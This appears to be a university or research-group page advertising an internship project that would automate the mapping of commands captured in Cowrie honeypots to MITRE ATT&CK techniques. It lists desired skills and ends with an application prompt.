Automating Attack Techniques to the MITRE ATT&CK Framework
Research Group Activity
In recent years threat intelligence frameworks such as MITRE ATT&CK have provided a common lexicon for the cybersecurity industry. Furthermore, they have allowed the tactics and techniques employed by malicious parties and attackers to be classified and profiled effectively. However, profiling attackers and their techniques using the framework takes time due to the amount of data that needs to be sorted and inspected. Conversely, the intelligence gained from undertaking such an endeavour can prove to be invaluable to organizations in the context of how to counter and respond to the threats they face. On the other hand, honeypots have long provided a means by which to observe and monitor attackers. However, without manual intervention, the identification and analysis of behaviours and techniques that could be potentially harvested from malicious parties/attacker interactions would go unscrutinised. A means of automation would reduce the huge amounts of time it would take an analyst to wade through captured data and provide effective and effectual threat intelligence, especially when coupled with a knowledge base of adversarial techniques such as MITRE ATT&CK. The ability to automatically scrutinise attacker behaviours and techniques to the common lexicon of the MITRE ATT&CK framework could potentially provide organizations with a means to mitigate the vast amounts of resources needed to conduct threat intelligence.
Project Description
The project aims to address the following question: "Can honeypots be automated in a manner that allows for commands executed inside them to be automatically detected and attributed correctly to the MITRE ATT&CK Framework".
The project will involve developing a framework/further developing existing mechanisms in which to automate analysis of captured honeypot data so that they can be fingerprinted and mapped correctly to the MITRE ATT&CK framework. Additionally, establishing/assessing the accuracy of the collected fingerprints against the MITRE ATT&CK techniques.
Required Skills
Understanding of MITRE ATT&CK framework is desirable but not essential.
Experience in deploying and maintaining honeypots (Cowrie) is desirable but not essential.
Experience of using docker is desirable but not essential.
Experience of coding in python and implementing the YARA python library is desirable but not essential.
Apply for this Project
If you wish to apply for this project, fill in the form below including uploading your CV and personal statement, explaining why you want to do this particular internship project. Attachments must be in PDF format.